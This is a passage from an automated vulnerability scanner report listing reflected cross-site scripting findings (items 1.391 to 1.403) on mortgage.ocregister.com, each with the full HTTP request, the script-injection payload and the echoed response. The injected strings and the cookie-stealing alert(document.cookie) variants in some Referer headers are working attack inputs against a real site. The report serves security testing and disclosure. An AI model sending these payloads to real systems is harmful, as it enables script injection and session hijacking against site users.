Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" />
...[SNIP]...

1.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" />
...[SNIP]...

1.392. http://mortgage.ocregister.com/files [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" />
...[SNIP]...

1.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" />
...[SNIP]...

1.394. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.012f7c"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.012f7c\"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.cssfeed/" />
...[SNIP]...

1.395. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content17b7a"><script>alert(1)</script>df3c8a873d1/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content17b7a\"><script>alert(1)</script>df3c8a873d1/dmhotlinks.cssfeed/" />
...[SNIP]...

1.396. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content/dmhotlinks.css92232"><script>alert(1)</script>8606eb47764 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css92232\"><script>alert(1)</script>8606eb47764feed/" />
...[SNIP]...

1.397. http://mortgage.ocregister.com/wp-content/plugins/democracy/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" />
...[SNIP]...

1.398. http://mortgage.ocregister.com/wp-content/plugins/democracy/democracy.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/democracy.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" />
...[SNIP]...

1.399. http://mortgage.ocregister.com/wp-content/plugins/democracy/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" />
...[SNIP]...

1.400. http://mortgage.ocregister.com/wp-content/themes/onSet/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/themes/onSet/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" />
...[SNIP]...

1.401. http://mortgage.ocregister.com/wp-includes/js/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" />
...[SNIP]...

1.402. http://mortgage.ocregister.com/wp-includes/wlwmanifest.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/wlwmanifest.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" />
...[SNIP]...

1.403. http://mortgage.ocregister.com/xmlrpc.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
